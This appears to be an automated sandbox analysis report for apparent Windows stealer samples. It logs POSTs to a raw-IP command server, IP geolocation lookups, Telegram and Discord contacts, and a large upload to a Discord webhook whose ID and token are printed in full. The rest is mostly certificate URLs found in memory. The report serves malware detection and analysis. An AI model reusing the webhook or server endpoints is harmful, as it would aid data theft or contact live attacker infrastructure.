Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1996Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.42.154

Source: global traffic

HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2

Source: based.exe, 00000004.00000002.2386609527.00000201D10B4000.00000004.00001000.00020000.00000000.sdmp

String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 761014User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=ae617a8a1c033a753623c0f68de035b0

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Aug 2024 02:28:09 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=b151a2c64fad11ef8beb969bb34c99ef; Expires=Tue, 31-Jul-2029 02:28:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1722479290x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2C1ydocOQ2xMnFPXwJ2xVHefN1DwZxzUkt2yGnLAoV7iE5WV0r3QSdBKpqiNDNqOhMPa%2BBjzZBcJFV%2BK2fq8nEamAve7E2UQCVSILjZ9873ZF8SlAKmdavBLDQY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=b151a2c64fad11ef8beb969bb34c99ef78f5274c8378281a77dc6bf9633760fb25a9feef22631a2c005696eb41e4adde; Expires=Tue, 31-Jul-2029 02:28:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=3d905955f4beffde0eab7938151d2b1d8621eb2e-1722479289; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None

Source: hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000011.00000002.2043962328.0000028A53BF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: based.exe, 00000002.00000002.2420679707.000001F9199F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Digi
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: based.exe, 00000002.00000003.1670882598.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: based.exe, 00000004.00000003.1700875688.00000201D052B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1877831426.00000201D081E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D081F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1852139141.00000201D081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
